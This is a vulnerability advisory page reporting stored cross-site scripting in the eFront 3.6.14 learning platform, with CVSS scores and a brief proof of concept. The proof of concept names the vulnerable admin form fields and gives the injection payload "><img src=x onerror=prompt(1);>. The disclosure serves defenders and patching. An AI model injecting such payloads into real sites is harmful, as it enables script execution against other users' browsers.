eFront 3.6.14 Cross Site Scripting

2013-12-12 / 2013-12-22
Credit: sajith
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

########################################################### EDB Note: Screenshot provided by exploit author. ########################################################### [~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple Parameters [~] Author: sajith [~] version: eFront v3.6.14- build 18012 [~]Vendor Homepage: http://www.efrontlearning.net/ [~] vulnerable app link:http://www.efrontlearning.net/download ########################################################### POC by sajith shetty: [###]Log in with admin account and create new user http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1 (Home ? Users ? Administrator S. (root) ? New user) Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x onerror=prompt(1);> ] [###]create new lesson option ( http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php ? ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss [payload:"><img src=x onerror=prompt(1);> ] [###]create new courses option( http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php ? ctg=courses&add_course=1) where "Course name:" filed is vulnerable to stored XSS


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top